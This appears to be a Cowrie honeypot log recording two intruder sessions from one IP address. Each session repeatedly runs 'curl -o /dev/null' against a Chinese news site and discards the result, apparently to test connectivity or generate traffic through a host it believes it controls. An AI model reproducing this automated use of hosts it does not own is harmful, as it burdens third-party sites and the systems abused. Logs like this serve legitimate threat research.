{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.649477Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.650846Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.652087Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.677573Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.685174Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.691050Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.692314Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.700907Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.702471Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.726999Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.734164Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.736328Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.742061Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.743346Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.775084Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.776453Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.779852Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.781946Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.783166Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.818363Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.819686Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.824825Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.825935Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.856073Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.857211Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.864126Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.865136Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.889623Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.901497Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.902851Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.907132Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.908188Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.914727Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.944021Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.945540Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.971020Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:18.973140Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:18.974613Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.000258Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.001736Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.018938Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.020361Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.037251Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.038867Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.059003Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.060270Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.082595Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.083700Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.099383Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.106629Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.107820Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.126639Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.128129Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.145322Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.146466Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.163324Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.164536Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.181856Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.219286Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.220488Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.231294Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.232398Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.264962Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.266317Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.269792Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.270873Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.303258Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.304453Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.306494Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.309788Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.311117Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.347672Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.348944Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.351539Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.352679Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.357933Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.362211Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.373069Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.374339Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.385632Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.387114Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.388994Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.389993Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.424720Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.425976Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.427875Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.429292Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.462593Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.463748Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.468380Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.469930Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.494069Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.500764Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.501886Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.507095Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.508185Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.537144Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.538295Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.549581Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.550774Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.575591Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.581106Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.582242Z","src_ip":"212.227.125.160","session":"7541ed730449"}
